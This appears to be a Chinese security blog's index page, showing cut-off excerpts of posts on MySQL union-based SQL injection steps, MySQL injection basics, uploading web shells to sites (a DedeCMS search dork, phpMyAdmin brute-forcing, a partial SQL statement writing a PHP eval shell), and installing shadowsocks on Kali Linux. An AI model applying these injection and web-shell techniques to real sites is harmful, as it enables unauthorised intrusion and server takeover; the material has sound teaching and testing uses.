Mysql 联合查询注入一般流程

一、判断是否存在注入

  • 在有传值得url后面输入’, ”或者),通过返回错误,判断sql语句是用什么符号闭合的。在url后面输入 ’返回如图错误,初步判断是sql语句是通过’闭合。

  • 然后在后面构建一个恒等式看我们的sql语句能不能正常执行。通过执行恒等式and 1=1 返回正常,and 1=2返回不正常,判断出此页面存在注入点 --+对数据库后面的查询语句做注释。

二、判断系统查询语句的字段的个数

1、通过order by n 判断本查询语句的字段的个数。Order by mysql的排序语句。如果n 大于表中的字段数就会报错。小于表中字段返回正常。Ord[......]

继续阅读

Mysql注入常用知识

一、默认安装有四个数据库:

1、information_schema 
2、mysql 
3、performance_schema
4、test

二、查询语句:

select * from 库名.表名   //查看表中所有元素
insert into 表名(字段1,字段2) values ('1','2')  //在表中插入
delete from 表名 条件     //删除表
drop 库名           //删除数据库
update 表名 set 字段名='' where   //更新

三、常用的命令:

union select 联合查询,注:前后的字段必[......]

继续阅读

网页木马常见上传及绕过方法

一、正常上传

织梦cms ,谷歌关键字powered by dedecms, 根据版本找漏洞。

二、数据库备份

良通精用cms,上传一个带马的图片然后数据库备份为.asp或.php文件

三、配置文件插马

这个最好有一个网站源码测试,不然容易把网站搞坏。在有源码的情况下可以结合findstr /s命令找到网站配置文件位置。

四、数据库命令管理拿shell

常见的phpmyadmin后台,暴力破解用户名密码。
create table xxx (cmd text NOT NULL)
insert into xxx (cmd) values ('<?php eval($_PO[......]

继续阅读

Kali Linux安装shadowsocks客户端

一、安装图形化界面(未测试成功)

在/etc/apt/sources.list 最后加上
deb http://ppa.launchpad.net/hzwhuang/ss-qt5/ubuntu devel main
apt-get update&&apt-get install shadowsocks-qt5
找到影梭软件,点击“连接”——>“添加”——>“手动”

二、安装命令行界面的

apt-get install python-pip
sudo pip install shadowsocks
gedit /etc/shadowsocks.json[......]

继续阅读